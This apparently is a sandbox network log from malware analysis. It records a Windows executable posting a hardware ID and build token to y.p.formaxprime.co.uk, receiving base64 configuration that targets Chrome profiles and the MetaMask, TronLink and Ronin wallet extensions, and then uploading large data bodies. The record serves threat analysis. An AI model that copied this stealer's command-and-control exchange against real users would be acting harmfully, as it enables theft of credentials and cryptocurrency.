                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:13 UTC271OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----90r90zuknop8ym7qiwbs
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 256
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:13 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 33 41 35 35 41 30 43 30 44 33 33 32 36 33 32 34 32 37 36 35 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 39 30 72 39 30 7a 75 6b 6e 6f 70 38 79 6d 37 71 69 77 62 73 2d 2d 0d
                                                                                                                                          Data Ascii: ------90r90zuknop8ym7qiwbsContent-Disposition: form-data; name="hwid"F3A55A0C0D332632427659-a33c7340-61ca------90r90zuknop8ym7qiwbsContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------90r90zuknop8ym7qiwbs--
                                                                                                                                          2025-03-19 13:00:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:14 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:14 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 30 7c 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 3a1|1|1|0|5db94ad8854c4b4b48c7c8e4f6bb3688|1|1|1|0|0|50000|10


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.104968478.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:15 UTC271OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----djecjectjectjectri58
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 331
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:15 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 64 6a 65 63 6a 65 63 74 6a 65 63 74 6a 65 63 74 72 69 35 38 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------djecjectjectjectri58Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------djecjectjectjectri58Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------djecjectjectjectri58Cont
                                                                                                                                          2025-03-19 13:00:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:15 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:15 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                          Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.104968578.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:17 UTC271OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----hvkf3eu3o8gln7qqqq1d
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 331
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 68 76 6b 66 33 65 75 33 6f 38 67 6c 6e 37 71 71 71 71 31 64 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------hvkf3eu3o8gln7qqqq1dContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------hvkf3eu3o8gln7qqqq1dContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------hvkf3eu3o8gln7qqqq1dCont
                                                                                                                                          2025-03-19 13:00:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:17 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:17 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                          Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.104968678.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:20 UTC271OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----as268yukfusrqq9rim79
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 332
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:20 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 36 38 79 75 6b 66 75 73 72 71 71 39 72 69 6d 37 39 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------as268yukfusrqq9rim79Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------as268yukfusrqq9rim79Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------as268yukfusrqq9rim79Cont
                                                                                                                                          2025-03-19 13:00:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:20 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:20 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          6192.168.2.104969478.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:00:27 UTC272OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----ba168gln7qieuaaiwbi5
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 5721
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:00:27 UTC5721OUTData Raw: 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 62 61 31 36 38 67 6c 6e 37 71 69 65 75 61 61 69 77 62 69 35 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------ba168gln7qieuaaiwbi5Content-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------ba168gln7qieuaaiwbi5Content-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------ba168gln7qieuaaiwbi5Cont
                                                                                                                                          2025-03-19 13:00:28 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:00:27 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:00:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          7192.168.2.104969978.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:15 UTC271OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----phlnglxt268gvasr1djw
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 489
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:02:15 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 70 68 6c 6e 67 6c 78 74 32 36 38 67 76 61 73 72 31 64 6a 77 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------phlnglxt268gvasr1djwContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------phlnglxt268gvasr1djwContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------phlnglxt268gvasr1djwCont
                                                                                                                                          2025-03-19 13:02:16 UTC158INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx
                                                                                                                                          Date: Wed, 19 Mar 2025 13:02:16 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          2025-03-19 13:02:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.104970078.47.63.1324436980C:\Users\user\Desktop\random(2).exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-03-19 13:02:16 UTC274OUTPOST / HTTP/1.1
                                                                                                                                          Content-Type: multipart/form-data; boundary=----5xbaimgln7qim7yctjwl
                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:135.0) Firefox/135.0
                                                                                                                                          Host: y.p.formaxprime.co.uk
                                                                                                                                          Content-Length: 262605
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 64 62 39 34 61 64 38 38 35 34 63 34 62 34 62 34 38 63 37 63 38 65 34 66 36 62 62 33 36 38 38 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 30 36 32 31 61 66 34 39 34 37 66 36 66 37 38 30 30 38 36 35 61 35 63 38 30 64 38 66 33 32 39 0d 0a 2d 2d 2d 2d 2d 2d 35 78 62 61 69 6d 67 6c 6e 37 71 69 6d 37 79 63 74 6a 77 6c 0d 0a 43 6f 6e 74
                                                                                                                                          Data Ascii: ------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="token"5db94ad8854c4b4b48c7c8e4f6bb3688------5xbaimgln7qim7yctjwlContent-Disposition: form-data; name="build_id"80621af4947f6f7800865a5c80d8f329------5xbaimgln7qim7yctjwlCont
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                          2025-03-19 13:02:16 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
